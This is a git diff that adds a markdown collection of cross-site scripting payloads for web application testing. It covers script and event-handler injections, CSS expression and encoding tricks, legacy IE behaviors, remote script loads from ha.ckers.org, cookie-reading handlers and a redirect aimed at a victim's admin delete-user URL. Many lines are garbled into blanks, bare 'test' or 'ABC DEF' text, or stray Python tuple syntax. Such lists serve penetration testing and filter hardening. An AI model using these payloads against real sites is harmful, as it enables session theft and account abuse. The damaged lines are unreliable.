diff --git a/web_application_testing/xss_vectors.md b/web_application_testing/xss_vectors.md new file mode 100644 index 0000000..2db1223 --- /dev/null +++ b/web_application_testing/xss_vectors.md @@ -0,0 +1,672 @@ +# A collection of XSS vectors + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +\x3Cscript>javascript:alert(1) +'"`> + + +--> --> +--> +--> +--> +`"'>

+test +test +test +test +test +test +test +test +test +test +test +test +test +test + + + + + + + +"'`>ABC
DEF +"'`>ABC
DEF + + + +'`"><\x3Cscript>javascript:alert(1) +'`"><\x00script>javascript:alert(1) +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> + + + + +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +javascript:alert(1); +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +ABC
DEF +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +test +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"`'> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +"/> +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +javascript:alert(1) +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> +`"'> + + + + +alert(1)0 +
+ + + + +"> +"> +"> +"> + +<% foo> +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +XXX + + + +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo ;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror =javascript:alert(1)>"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="javAascript:javascript:alert(1)">test1</a> +<a href="javaascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC="  javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// + + + + + +
  • XSS
    + + + + +
    + + + + + + + +exp/* + + + + + + +¼script¾alert(¢XSS¢)¼/script¾ + + + + + + + +
    +
    +
    +
    +
    + + + + + +alert("XSS")'); ?> + +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser + + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- + + + + + + +PT SRC="http://ha.ckers.org/xss.js"> +XSS +XSS +XSS +XSS +XSS +XSS + + + + +click + + + + + + --!> + +